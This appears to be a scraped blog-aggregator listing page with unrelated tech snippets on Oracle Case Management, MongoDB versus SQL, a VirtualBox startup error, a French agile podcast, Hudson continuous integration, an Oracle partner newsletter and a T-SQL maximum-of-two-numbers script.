hopefully going to save my customers a lot of time and effort! I may make amendments to this post as my understanding of Case Management increases! Take a look at the following links for official documentation etc. http://docs.oracle.com/cd/E28280_01/doc.1111/e15176/case_mgmt_bpmpd.htm https://blogs.oracle.com/bpm/entry/just_in_case Normal 0 false false false EN-US X-NONE X-NONE MicrosoftInternetExplorer4 /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Calibri","sans-serif";}

    Read the article

  • Does the use of mongodb it easier to extend/change database driven applications?

    - by developer10214
    When an application is created which need to store data, an SQL database is used very often. So did I in a lot of asp.net applications. The resulting applications have often an ORM like the entity framework and maybe a business layer. So when such an application needs to be extended(let's say you have to add a comment property to an object), you have to change/extend the database, then the ORM and the business layer and so on. To deploy the changes you have to update the target database and the application. I know that things like code first and fluent can make this approach easier. I tried mongodb, I only used the standard driver and I had to extend some objects and all I had to do was changing the code. So it feels that such approaches are much easier to realize when using mongodb. I don't have much experience with larger applications an mongodb. I know that a SQL database or mongodb doesn't fit for all needs and both have their pros and cons. I want to know if my feeling is right, if yes I would choose rather choose mongodb than SQL database.

    Read the article

  • Virtualbox does not run: NS_ERROR_FAILURE

    - by dschinn1001
    here is ubuntu 12.10 virtual-box is somehow not working: I was trying to install win7 on to an usb-hard-disk. boinc is switched off and RAM-size is set to 4096 MB (too big ? of possible 8 Gibi ) report of virtual-box is: the com-object for virtualbox could not be created. the application is now ended. Start tag expected, '&lt;' not found. Location: '/home/$user/.VirtualBox/VirtualBox.xml', line 1 (0), column 1. /build/buildd/virtualbox-4.1.18-dfsg/src/VBox/Main/src-server/VirtualBoxImpl.cpp[484] (nsresult VirtualBox::init()). Fehlercode:NS_ERROR_FAILURE (0x80004005) Komponente:VirtualBox Interface:IVirtualBox {c28be65f-1a8f-43b4-81f1-eb60cb516e66} comment of me: why is virtualbox installing xml into folder of $user in .VirtualBox ? should it not be on usb-harddisk ? (with 500 Gibi ) first installation attempt was breaking off (with win7 in 64Bit) should I try virtual-box (ubuntu 64Bit) with win7 in 32Bit ? should I leave RAM-size of virtual-box to default 512 MB ? thanks for reply

    Read the article

  • Visual Studio Talk Show #114 is now online - Le responsable de projet est-il mort? (French)

    - by guybarrette
    http://www.visualstudiotalkshow.com Bernard Fedotoff: Le responsable de projet est-il mort? Nous discutons avec Bernard Fedotoff sur comment jumeler la gestion de projet et les méthodes de développement agile. Entre autres, avec les méthodes agiles on se demande où est la place du responsable de projet. Bernard Fedotoff est Microsoft Regional Director depuis 1996 ; il a animé les Devdays et Techdays en Suisse et en France depuis 1997. Il a été fondateur et PDG de PSEngineering depuis 1990, société qu’il a revendue en 2004. En 2005, il a fondé la société Agilcom. Bernard a mené auprès de clients français, suisses, et d'afrique du nord de nombreuses missions en technologie .Net, d'architecture et de coaching d'équipes de dévoppement. Son passé de Pdg et son expertise technologique apportent aux projets qu'il accompagne deux points de vue riches d'expériences et de convictions. Il a aussi accompagné la mise en place de plateaux offshores vers la Tunisie, en implémentant des approches Agile avec Team Foundation Server. Enfin, il est aussi co-auteur de nombreux ateliers des coachs publiés sur le site MSDN de Microsoft France. Bernard est titulaire d’un diplôme d’ingénieur ainsi que d’un troisième cycle universitaire en robotique. Il consacre ses quelques minutes de temps libre à la montagne Télécharger l'émission Si vous désirez un accès direct au fichier audio en format MP3, nous vous invitons à télécharger le fichier en utilisant un des boutons ci-dessous. Si vous désirez utiliser le feed RSS pour télécharger l'émission, nous vous invitons à vous abonnez en utilisant le bouton ci-dessous. Si vous désirez utiliser le répertoire iTunes Podcast pour télécharger l'émission, nous vous encourageons à vous abonnez en utilisant le bouton ci-dessous. var addthis_pub="guybarrette";

    Read the article

  • Hudson.. another Continuous Integration tool

    - by Narendra Tiwari
    In my previous posts I discussed about Cruisecontrol.net and its legacy support to .Net development. Hudson  is yet another continuous integration tool. Hudson is also free like CCNet and built in java. - CCNet has its legacy support to .Net applications where as Hudson can be easily configured on both the environments (.Net and Java). - One of the major differences in CCNet and Hudson is the richer GUI of Hudson provide user interactive screens for project configuration where as in CCNet we have to play with a few xml configuration files. Both the tools are capable of providing basic features of continuous integration e.g.:- - Source Control configuration - Code Compilation/Build - Ad hoc plugin tools to be configured along with compilation Support for adhoc tools seems to be bigger with CCNet e.g. There are almost every source control plugin available with CCNet where as Hudson has support for limited source control servers. Basically there is an interseting point to see is that there are 2 major partsof whole CI system one performed by build tool and rest. Build tool takes care of all adhoc plugin tools  so no matter if CI tool does not have plugin for that tool if thet tools provides command line support that can be configured in build tool and that build tool is then configured with CI tool inturn. For example if I have a build script configured in MSBuild and CCNet can be easily switched to Hudson. Here we need not to change anything in build script we just need to configure MSBuild on Hudson and pass the path of script file and thats it... all is same. Hudson Resources:- - https://hudson.dev.java.net/ - http://wiki.hudson-ci.org/display/HUDSON/Meet+Hudson - http://wiki.hudson-ci.org/display/HUDSON/Plugins - http://callport.blogspot.com/2009/02/hudson-for-net-projects.html Java support on CCNet http://confluence.public.thoughtworks.org/display/CC/Getting+Started+With+CruiseControl?focusedCommentId=19988484#comment-19988484 Please share your thoughts...

    Read the article

  • l'e-news Arrow ECS-Oracle

    - by mseika
    Si vous ne visualisez pas cet email, cliquez ici Agenda Accompagnement Arrow ECS Cut-off Q4FY12 Oracle SoftwareEn raison du closing Oracle de mai, les commandes Oracle doivent être enregistrées chez Arrow ECS avant : - Le 27 avril 2012 pour les commandes Hardware - Le 20 mai 2012 pour les commandes Software Pour plus d'information, contactez votre commercial dédié Oracle Les WebExperts Oracle by Arrow45 minutes pour monter en compétence grâce à nos formations gratuites en ligne.Prochaines sessions :- La tarification Oracle SW : 2 avril à 11h- Le programme OMM : 4 avril à 11h- ODA : l'appliance Oracle pour les PME-PMI : 16 avril à 11h- Weblogic, les différentes éditions : 2 mai 2012 à 11h Forum Big Data le 5 avrilDécouvrez comment Oracle va accélérer et faciliter vos projets de déploiement Big Data.Pour en savoir plus et vous inscrire Workshop technique Oracle VM3Venez découvrir les nouveautés d'Oracle VM3 et de Linux 6 lors d'un workshop technique, le 26 avril prochain à Colombes.Pour en savoir plus et vous inscrire Bootcamp ODA en régions Arrow vous propose des formations sur la solution Oracle Database Appliance.Les prochaines étapes : Aix, Bordeaux et Nantes.Préinscrivez-vous dès aujourd'hui ! "Bootcamp Implementation" Oracle : obtenez la préférence de vos clients en devenant spécialiste Oracle Nous vous proposons 2 sessions de préparation à ces examens au tarif spécial de 1090€ HT : - Oracle Database 11g Certified Implementation Specialist : du 23 au 27 avril 2012 - Oracle WebLogic Server 11g : Administration avancé, du 21 au 25 mai 2012 Inscrivez-vous vite, le nombre de places est limité.Pour en savoir plus, contactez l'équipe formation L'Exalabs Solution Center d'Arrow ECS Centre de formation unique en France, l'Exalabs Solution Center dispose de l'intégralité de l'infrastructure technique intégrée d'Oracle : Exadata, Exalogic, ODA...Mobile, il permet d'organiser des démonstrations pratiques, des séminaires de formation, des POC* in situ.*Proof Of ConceptFaîtes vos demandes auprès de notre équipe dédiée Ateliers de certification OracleLe passage des tests de certification est l'étape préalable vers la Spécialisation de votre société.Nous vous proposons de vous accompagner lors d'ateliers dédiés.Vous êtes intéressés ? Faites-le nous savoir Formez-vous sur les produits OracleVous souhaitez former vos commerciaux aux nouveaux produits Oracle : ODA, Exadata...Faîtes vos demandes auprès de notre équipe dédiée Lancez votre activité Oracle avec le Starter KitVous souhaitez démarrer votre business Oracle Software ou Oracle Hardware ?Arrow ECS vous propose un programme dédié pour vous aider à développer rapidement les ventes.Demandez votre Starter Kit L'équipe Oracle chez Arrow ECS - Tél : 01 49 97 59 63 - email : [email protected] Pour passer vos commandes, un n° de fax : 01 49 97 49 49

    Read the article

  • SQL SERVER – T-SQL Scripts to Find Maximum between Two Numbers

    - by pinaldave
    There are plenty of the things life one can make it simple. I really believe in the same. I was yesterday traveling for community related activity. On airport while returning I met a SQL Enthusiast. He asked me if there is any simple way to find maximum between two numbers in the SQL Server. I asked him back that what he really mean by Simple Way and requested him to demonstrate his code for finding maximum between two numbers. Here is his code: DECLARE @Value1 DECIMAL(5,2) = 9.22 DECLARE @Value2 DECIMAL(5,2) = 8.34 SELECT (0.5 * ((@Value1 + @Value2) + ABS(@Value1 - @Value2))) AS MaxColumn GO I thought his logic was accurate but the same script can be written another way. I quickly wrote following code for him and which worked just fine for him. Here is my code: DECLARE @Value1 DECIMAL(5,2) = 9.22 DECLARE @Value2 DECIMAL(5,2) = 8.34 SELECT CASE WHEN @Value1 > @Value2 THEN @Value1 ELSE @Value2 END AS MaxColumn GO He agreed that my code is much simpler but as per him there is some problem with my code which apparently he does not remember at this time. There are cases when his code will give accurate values and my code will not. I think his comment has value but both of us for the moment could not come up with any valid reason. Do you think any scenario where his code will work and my suggested code will not work? Reference: Pinal Dave (http://blog.SQLAuthority.com) Filed under: Pinal Dave, PostADay, SQL, SQL Authority, SQL Query, SQL Scripts, SQL Server, SQL Tips and Tricks, T SQL, Technology

    Read the article

  • SonicAgile 2.0 with a Real-Time Backlog and Kanban

    - by Stephen.Walther
    I’m excited to announce the launch of SonicAgile 2.0 which is a free Agile Project Management tool.  You can start using it right now (for free) by visiting the following address: http://sonicagile.com/ What’s special about SonicAgile?  SonicAgile supports a real-time backlog and kanban. When you make changes to the backlog or kanban then those changes appear on every browser in real-time. For example, if multiple people open the Kanban in their browser, and you move a card on the backlog from the To Do column to the Done column then the card moves in every browser in real-time. This makes SonicAgile a great tool to use with distributed teams. SonicAgile has all of the features that you need in an Agile Project Management tool including: Real-time Backlog – Prioritize all of your stories using drag-and-drop. Real-time Kanban – Move stories from To Do, In Progress, to Done Burndown Charts – Track the progress of your team as your work burns down over time. Iterations – Group work into iterations (sprints). Tasks – Break long stories into tasks. Acceptance Criteria – Create a checklist of requirements for a story to be done. Agile Estimation – Estimate the amount of work required to complete a story using Points, Shirt Sizes, or Coffee Cup sizes. Time-Tracking – Track how long it takes to complete each story and task. Roadmap – Do release planning by creating epics and organizing the epics into releases. Discussions – Discuss each story or epic by email. Watch the following video for a quick 3 minute introduction: http://sonicagile.com/ Read the following guide for a more in-depth overview of the features included in SonicAgile: http://sonicagile.com/guide-agile-project-management-using-sonicagile/ I’d love to hear your feedback!  Let me know what you think by posting a comment.

    Read the article

  • SharePoint MVP Chat &ndash; tomorrow and day after

    - by Sahil Malik
    Ad:: SharePoint 2007 Training in .NET 3.5 technologies (more information). Yes we’re doing it again! After two very successful chats, a number of MVPs will be online in chat style answering your SharePoint questions. Here’s the schedule Tuesday May 25th at 4PM PDT (join here) Agnes Molnar Bill English Brian Farnhill Bryan Phillips Clayton Cobb David Mann <—ask him to tell a joke, he has a great sense of humor! Also bug him about Workflows. Matt McDermott Paul Stork Rob Bogue <—Ask him about WFs too. Rob Foster <— Him and Nick Swan run a SharePoint podcast. Sahil Malik <—I know him Saifullah Shafiq Ahmed   Wednesday at 9AM PDT (join here) Andrew Connell <— youngest MVP ever! LOL. Becky Bertram Bil Simser Chadima Kulathilake Claudio Brotto Gary Lapointe <—the stsadm extensions guy, ask him about powershell Darrin Bishop John Ross Michael Mukalian Muhanad Omar Randy Drisgill <—he created SP2010 starter master pages. Ask him about branding Shane Young Todd Bleeker Zlatan Dzinic Comment on the article ....

    Read the article

  • Advantages of using pure JavaScript over JQuery

    - by Shivan Dragon
    What are the advantages of using Javascript-only versus using JQuery-only? I have limited experience with JavaScript and JQuery coding. I've added bits and snippets of each to HTML pages but I've mostly coded server-side stuff in other languages. I've noticed that while you can theoretically do the same things using either of the two approaches (and of course you can even mix 'em up in the same project) there seems to be a tendency to always start using JQuery from the very beginning no-matter what the project demands are. So I'm simply wondering, are there any punctual benefits to not use JQuery-only but instead to just use plain old JavaScript? I know this looks like a non-question because it can be said about it that "there's no definite answer" or "it can be debated for ever", but I'm actually hoping for punctual answers such as "You can do this in one approach and you cannot do it with the other". ==EDIT== As per scrwtp's comment, I'm not referring just to the DOM Handling part. My question is rather: JQuery is a library. For Javascript. What I find strange about this library as opposed to other libraries for other languages is that in JQyery's case it seems to be designed to be able to use it exclusively and not need to touch Javascript directly. This is as opposed to let's say Hibernate and SQL, where even though the library (or rather framework in this case, but I think the analogy still applies) takes the handle on A LOT of aspects, you still get to use SQL when using it, at least for some fringe cases. However in JQuery & Javascript case, you could do anything you do with Javascript using only JQuery (or at least that's how it seems to me).

    Read the article

  • DNS: forward part of a managed domain to one host, but sub domain services to another (Google Apps)

    - by Paul Zee
    I was going to post this as a comment against DNS: Forward domain to another host, but I don't seem able to do that. I'm in a similar situation. I have a DNS registered/managed by enom, except with the slight twist that the domain was originally registered with enom through a Google Apps account creation. The domain currently supports a Google Apps site/account. I now want to direct the bare primary domain and www entries to a hosting provider for the website component, but leave the Google Apps setup intact for its services such as calendar, mail etc. For now, I'm leaving the domain managed by enom. Also note that when I registered my account with the hosting provider, I gave the same domain name as the existing domain (e.g. example.com), so at their end I'm working with the same domain name in cpanel, etc. In my case, the existing enom DNS entries don't have an A record for the www.example.com, or the bare example.com domain. Instead, there are 4 x @ records with the Google Apps IP Address, 2 x TXT records with what I assume are Google Apps site verification strings/tokens, and a bunch of CNAME records for the various features of Google Apps (mail, calendar, docs, sites, etc). So, my questions: How do I point the www.example.com and example.com DNS entries at enom to my web site hosting provider, while leaving the domain managed by enom, and the Google Apps services working as they are now (with the obvious exception of Google Sites)? How do I setup the example.com mail-related DNS records (MX, etc) at the web site hosting provider, so that outbound email to [email protected] gets correctly sent to the google apps mail account, and doesn't get trapped inside the pseudo domain within the hosting providers servers?

    Read the article

  • SQL SERVER – How to an Add Identity Column to Table in SQL Server

    - by Pinal Dave
    Here is the question I received on SQLAuthority Fan Page. “How do I add an identity column to Table in SQL Server? “ Sometime the questions are very very simple but the answer is not easy to find. Scenario 1: If you are table does not have identity column, you can simply add the identity column by executing following script: ALTER TABLE MyTable ADD ID INT IDENTITY(1,1) NOT NULL Scenario 2: If your table already has a column which you want to convert to identity column, you can’t do that directly. There is a workaround for the same which I have discussed in depth over the article Add or Remove Identity Property on Column. Scenario 3: If your table has already identity column and you can want to add another identity column for any reason – that is not possible. A table can have only one identity column. If you try to have multiple identity column your table, it will give following error. Msg 2744, Level 16, State 2, Line 2 Multiple identity columns specified for table ‘MyTable‘. Only one identity column per table is allowed. Leave a comment if you have any suggestion. Reference : Pinal Dave (http://blog.SQLAuthority.com) Filed under: PostADay, SQL, SQL Authority, SQL Query, SQL Server, SQL Tips and Tricks, T SQL Tagged: Identity

    Read the article

  • SQL SERVER – 2011 – Multi-Monitor SSMS Windows

    - by pinaldave
    I have a dual screen arrangement at my home system. I love it because it’s very convenient. When I am working with SQL Server 2008 R2 or any earlier versions, I would want to use both of the Monitor so I open two separate SQL Server Management Studio and work along with it. I have no complaints with my system, at all. I am totally fine with it. However, sometimes I face small issues, like when I just want a small code open in a separate window but I do not want the windows to take over the whole of another window. But then again, I am already used to this current system. Recently when I was working with SQL Server 2011 ‘Denali’ CTP1, I dragged one of the windows by accident, and suddenly it magically appeared out of its ‘Shell’ of SSMS and was appearing on a separate monitor. I played around a bit and figured out that SSMS now supports multi-monitor (or multi screen) support with single SSMS instance. We can now drag out and drag in any window and resize them at any size. Fantastic! If you are multi-monitor user, I am sure you will like this feature. This leads me to ask you question? Do you use multi-monitor system while working with SQL Server? Leave a quick comment. Reference: Pinal Dave (http://blog.SQLAuthority.com) Filed under: Pinal Dave, PostADay, SQL, SQL Authority, SQL Query, SQL Scripts, SQL Server, SQL Server Management Studio, SQL Tips and Tricks, T SQL, Technology

    Read the article

< Previous Page | 99 100 101 102 103 104 105 106 107 108 109 110  | Next Page >